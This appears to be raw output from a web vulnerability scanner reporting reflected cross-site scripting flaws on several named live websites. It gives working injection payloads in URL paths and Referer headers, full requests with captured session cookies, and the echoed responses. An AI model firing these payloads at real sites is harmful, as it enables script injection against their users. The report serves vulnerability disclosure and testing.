GET /category/list/tab/webseriesac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4550 Date: Thu, 03 Feb 2011 21:46:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=81
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 was submitted in the REST URL parameter 4. This input was echoed as b2a30"style="x:expression(alert(1))"fc975c07eb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /download/index/permalinkId/v18978294NGnK88j8b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:21 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 26859
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... <a id="thumb_browse_1" href="/browse/videos/category//watch/v18978294NGnK88j8b2a30"style="x:expression(alert(1))"fc975c07eb6" title="" class="thumb thumbLink" onclick=""> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b was submitted in the REST URL parameter 4. This input was echoed as ce5ce<img src=a onerror=alert(1)>c10905c976b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/-MENUVALUE-ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:49:08 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=67 Content-Length: 59484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"-MENUVALUE-ce5ce<img src=a onerror=alert(1)>c10905c976b","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e was submitted in the REST URL parameter 4. This input was echoed as cc326"><img src=a onerror=alert(1)>67cf1c4032e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/-MENUVALUE-cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:48:43 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=98 Content-Length: 59675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/search/videos/q/-MENUVALUE-cc326"><img src=a onerror=alert(1)>67cf1c4032e" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 was submitted in the REST URL parameter 4. This input was echoed as 14861"><img src=a onerror=alert(1)>93bdcf942a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/publisher:bunny1234414861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:48:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=78 Content-Length: 60152
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/search/videos/q/publisher:bunny1234414861"><img src=a onerror=alert(1)>93bdcf942a3" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 was submitted in the REST URL parameter 4. This input was echoed as e34d7<img src=a onerror=alert(1)>3d0b8bddcb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/publisher:bunny12344e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:49:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=62 Content-Length: 59961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"publisher:bunny12344e34d7<img src=a onerror=alert(1)>3d0b8bddcb4","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a041"style%3d"x%3aexpression(alert(1))"ad20725130b was submitted in the REST URL parameter 4. This input was echoed as 1a041"style="x:expression(alert(1))"ad20725130b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/flag/permalinkId/v18978294NGnK88j81a041"style%3d"x%3aexpression(alert(1))"ad20725130b HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=88 Content-Length: 32282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <form id="flagVideoForm" method="post" action="/video/submitflag/permalinkId/v18978294NGnK88j81a041"style="x:expression(alert(1))"ad20725130b" name="flagVideoForm" onsubmit="return verifyFlag(this);"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 was submitted in the REST URL parameter 4. This input was echoed as 42a1c"style="x:expression(alert(1))"80e77e495a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/share/permalinkId/v18978294NGnK88j842a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=63 Content-Length: 30205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <input type="text" onclick="this.select();" value="http://www.veoh.com/browse/videos/category//watch/v18978294NGnK88j842a1c"style="x:expression(alert(1))"80e77e495a9" readonly="true" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d839'-alert(1)-'88ff7fe44ab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8d839'-alert(1)-'88ff7fe44ab
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 17:52:34 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D8d839%27%2Dalert%281%29%2D%2788ff7fe44ab; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=IKKOGOICDOJPFCIEFKNGGLFL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff882"><script>alert(1)</script>9cbb95e5ed5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p-aasG6JkxVvmNA HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ff882"><script>alert(1)</script>9cbb95e5ed5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Thu, 03 Feb 2011 22:03:05 GMT Expires: Wed, 02 Feb 2011 10:03:06 GMT Cache-control: private, max-age=0 Set-Cookie: qcVisitor=0|82|1296770586032|0|NOTSET; Expires=Sat, 26-Jan-2041 22:03:06 GMT; Path=/ Set-Cookie: JSESSIONID=44D9028629FFF99EE86CE90A605E6EC0; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48f6c"-alert(1)-"c33954f4f7b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /community/blog HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623; Referer: http://www.google.com/search?hl=en&q=48f6c"-alert(1)-"c33954f4f7b
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:27:36 GMT Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=48f6c"-alert(1)-"c33954f4f7b"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a79f"-alert(1)-"94d6ddab3a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:46:53 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20791
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=3a79f"-alert(1)-"94d6ddab3a8"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52554"-alert(1)-"ef1396cf41e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:20:10 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20791
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=52554"-alert(1)-"ef1396cf41e"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8c66"-alert(1)-"92f4c806eeb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:20:45 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20754
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="d8c66"-alert(1)-"92f4c806eeb"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13f3c"-alert(1)-"f8f23428e65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
